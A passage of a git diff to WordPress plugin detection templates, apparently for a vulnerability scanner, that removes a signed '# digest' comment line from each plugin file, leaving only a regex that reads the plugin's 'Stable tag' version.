a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 1af78f1d47..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f398fa5f8067ca821ddf59aa5c926c616d5bb22b7a7bb227ce64e69ed3907a802206ca09e43d0b49a47ec377e7ec2e53c5021922f90c8ff0c6049057191ee5805af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index e9ef9bf627..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205b69dfe99d613742d7f594816646f71ca0def28eb177533cd673fac5908004e602206f5f06a6bc79f9e8c5c54ca99aca465fa2255d21a5466f9608ae35f239ab39fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 8e5016c723..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009562049e993f33758d66557cbf0f4dd163bba1f07102db165d7ba81293fe7fa6022100d883cec5ae3af7248396e77a35bceb4688718bcebcafee0206863bdabff64e30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 11206a8633..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d088fb8c32f93e2e85577e0a4da96d035df2a8e6555ee57119d53a58feec00d1022100d88387fb238daeb74543e40d7c4212a865b64fc0c59d330791cce50bee3feb3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 629fd1dda1..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c9ecf82466c5406a0e71e694a24ae86927ffc19bf58eeff8c28996078433b9102207caa18ce75bb66563bc06f60197bd2cc35aae0cb9a11e0f359cc4b702b1f0f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 5144cd7a60..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c5bbfce48044ab55d91965a1271c4509105177d2f80e4c83f6ffbfafb3915e6022100d3675c83b017d9177c820de4835700ba7b696feac38e334511d21041474b7279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 1b29cdb5b7..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd42cbd9b9f15398af17b40e70cef77e1eac6e128547a92f63c06524c519193b022100a2d3960f87c4a6492c148dbc8666a62e86f66f14d156e46ce9f95ea1ebf9da25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 7b88418422..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e17fcb9289b16d83bec469835b1aa8db0146286958222a23fe474480275ad55022055180a1c2613511c41163202cd2148dc443852a709bb7b2df95c73f78d9b497d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 2e3d6c1fb6..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8e5e5b2f252413f970e8b5dc255edb96dd77b183949359c9aa398fc00c7b1b0022100af720eed99b1d1bdc3e050e2a64b33095537cadfe71c0bd93f2070c6094a183a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 392c3e18e7..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100898851c563642ccc00d0d95764d519ff251ad6f7624af72fd0a3592e69e2cdab022100cacd35197163580e929d9c1708aa72a34ee90bd8ceec5cd449e6cad11c7682fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index ce3a77de47..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201376e759fadae424159524833cdb80bd937ae216611c8e0845aa877d82a63a65022100efb4e6bb7641a2e3db7ecb23e674609d32f8c4896cc69ed030da7fb40609231c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 29b9118d45..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089fd03dea74d4bea4797d1edae227edc67c2979c028d5ad81caf977dc534f57402207f3a0e66cbfa2e998c09a189987edd1ca08dd4b8bbb19fde78ac8b1a767ff44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 11a57238bd..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220539c0c1c0dffac3555b264fdcb166bab30744e5417f3631c14e4f47afe9e143d022100bb0f6cb9b364f0b2a62ae00e38dc46f31e3145df78f935876a769a5fc829ade0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index a6f0a6bdd0..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220033ac044822efd550903d411bd0b20331da602e0b613caac804426f7ddc115af0220191e89ea4ff07add0193380cb846832bc873d1e8a535db08d35b932460a4cc7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 416f527f39..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201498cafd64b3b6b72aae1faabc77347834d248622756287196d858010d05d5e2022100c8a38eda1656653eb3d572de04b23877ec7f32d099994e605a3857976622d810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d1721c828b..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c79c103f0ca19c3432924f804c5903717b11c32435062f9a0903230854b63432022100daec20777ca6c1181407f01eeffc97d528270cb2a3ee3f80e10ebd9c1c46acba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c35a5f1e3b..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e31546e7c1be8c8bd8818bd404edeb797d517fbec4c16de159e86d02e9a3aaae02202f10a979f3f304e590c15c7bf46d8f87fa5631e790789990614b362b43f2c9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index f4e794bd01..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce9ca71d82d607a7e596e05f9a7f99584fab9be6f6fd263cc3d545d9117dc9ba02205466c83966d732d54e1c6a689be6f88175a0b8f128a78b31d55eb9fc6a0cd1e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index dcdb949347..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ea0f99dca197a4db3a146206a876a7a055635a6c037c8ad287a2e544ef526050221009223692b313acafebdf4df3762c225a548f05451aecee42e230f9bd84f89ede5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 82fbefca13..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044969c5fdd70637563b63ce2438939c5bf4b6dd3de09aaa96c85ea85b15965b1022018a52efb5d2fb1338ce030b39891c951cd574628fbea9ef95ef9d649a2a813d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 41583637c3..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220502539580a3af5080e35cd439fe02d66f9546b65e0d65eea9c6f6cf16b3aba140220161692ed1b313def6c3192322f7c9c8931a5cae4ae2334c799d66a38b2f1659a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 942bc1e869..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220652a727ad8c787629b07f55e304b08b0157a33f734a203f14a9310ecbac3917602205db6cdc7749dcf230abe4bc20364fca9241c4b98a8014d6ea2cf29872b41b4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 84fbc045a5..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a217e6ed0c3351d099a073ade55bf7b741348d996fd1275b4af6f0496d6a60e022052face3a667682f6fdb2c683fb197df0768edcbc8ad1599bb4f9b48ae910c0e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 2ceb393f20..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6026934cd2089c1b8b59c9e3aeaf309fa53fd6e5beefae788912a7addd77d91022100d01224b615e7a744b1ab83e0a3859ace855e42402e8c202c1f8851559c59694f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 94f2053f65..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9586c758b7e8f36cabd33b98d6fa3cab7a5bb97e4d0989031d8c9e84ed93d8202200da538024f7c58cd72c848ac396556b98242ff7fd67bb0bdda3273cce72c6bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index c39c48ab42..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203de328d913c411e6d9cd0d454456548c2a0c8eab56202555e67f4f6719d55c8b02200bde0c65106d799f0411859f8dd1a4646e3bd6ab0dd8f2cb0605b3097038dcfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 8c5ca2c285..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d80796fc6f892fcc3749c3411ac9cb4d6a2fa6f0c13e476147098a3ad38042f022100a3123665849bb5800ec8c01ff28105efed8b4a4b5e3729c38d2cf5537f0cacaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 3ae5d294bd..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c355df2988d711d0c9242d259dd8b36177dbc730fc37d3f83d101a2422a925c8022100badaea1b22ec2e6bc464a7c111649e6bba5474d12e2d39e80bc2237f1471e44f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 23af31efea..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059f83df7a70dc13b47db2de3804294838a281ee5d16baf26f218bc86473ca23202210094e7e6435ae3c29342910fb4366f295d8dd5fdd9ac340516878ef1eddfaaa4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a2e9fce44d..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c4dacc0797bce31afd5c3d2d96748997accc9fc3a7121bfcdf9a835ba97b398022100c597424589d7c601b27868a2424ac0454ff1a543c13e471880cc237f0a1238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 52e07dd427..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdbeaf034ae2ee9e999205cdf6e5e6c5f5022abf3acad5e2982c24c3fe61af990220782f3ea34996694f2fc04f0c8422b840caba05e3db0ccf68942b85b8d0243d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 28ebd79b40..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220177315f59172c95a981143c3a14f09f3e8e028e645137e9666fa6117ebc3e78f022100e3c6380a6093bdf2a6527e0f16f01cebf124002439ab92390854fbfa9ca97083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index d38f98b8e1..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a90957e70e516a189fd8654384d035b34195b9bac470ab48ff7432e8950e16d4022100da3b6d6342ace4a0edf15b65269bb469d1c8c6f1aabf8b82f4419bdbec618fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 04aeb3ae33..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220757a2c6e97ebe9d26e77960166b78b76236364332d49882d0f2d2fae6035ca8b02204f273738b5f686fc373c860259d7608475bf60d4b744bc22743dd10885a7875c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 7f180e29f9..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4361efe1681c30df44f5ccfd1b2c6eee0c12b6d69b139814ae516cd76c3ba150220102cdcd9420fc3036d527e92f3fc5a24bb9c54175dfeddaea6eb8b16be52fe60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 3a49b64613..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a328f783173162e3672c5e346dea72efdde888f8a6277b343331105e00d25e89022006a8d0714b7a6c6cf0b69b25eea10af7b9c46dfd0b2af416ada5bc828f9e2278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 608e5ece69..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ac8f8d47893fedfe0423d1c53d16261160bec25d57f909616632b34c02328eb022077efd46e7fbc0ca58827abe07c5713371e015bc8e1409ced99b3f1544a7477af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 1083620794..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220553d74d7590c39bef77b305a7cfbce405e5914dc44316ba95dbe5a30a2a44f01022100826cbfe8af1b2e414e7c94dff11d0a18cba0178c1cb6393495c3c90c784ed708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 18db107468..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c852c8312e95300ae6e4291f9959fcaa2fc834684fd2f2cd125c926da4b8e8e3022100a35b8318c8ba67b07bf213feebc96679be3124ef6402ffd4d0be4abd7c50e964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bd84e2ae1..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f2c3c3c53d187d7101e21c18e85fa29e61da9aaebf929569223346d17ef5876022100df15222e1adac3cc18063168b73aba749d0a796b41369ace67d64c132ff41c49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 68315a3166..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b44b53ff527574ae0bbe78d824bb071bef2eac5b77d0e9ae67100708a4121ee3022100dbc72f06511f2dd1b6d35f36a6df2f4029fea0972a3429aaa2faa1e9981fd4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 661af31ac5..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a107f5a871b792554f078f9a6fa92bdb3df7140806a0d60cdf4f1c8263fa449d0221008325ca9bcba2f2ca81f7bca97833e50722baf3ecc7f337521d47f6d71a214570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 12d65bfc6a..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b646a545fd6932640f9969536cb51322c3c7604dda36093fc0a36918e51ed7a002205accea89e77e115fb082a73e71afaaeb073c7d38183876940b8a8240182aaf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 4e1a96688e..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3058c19712ad56b159dba866dd549d877c3ce2c6e41a60971cb79b23a64c103022100e2bb506554560a0bc03c942006e8b80f5f470d8123ad739e8bffe8adc3f44b63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 794529e578..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e1de6933399c3e09c84ca1af66d6a397eaf2c8ce682e7b88cc71eef04daa47f02204e6df57b9363adaccbd714f92ca21c0c52edfd51a8afcff31c0504e3f29798be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 928513400c..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bbc64de572645d495cae9a3002f866a4360a131bd0977a739517c417bcd37284022100afd6f142638d139fa73da6f43f23b45d7d86907a00ceb17a137480049af9eb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index ca291f5834..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e7a1afe2dffdaee7ce3503beb0d3e31db07153521b7d45bd67e67231763b6950220616db5ce8fb4fa6ebaa950d45f9a01ce00b44514715cec61384237a67c8a2551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 986cb8b9ae..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body 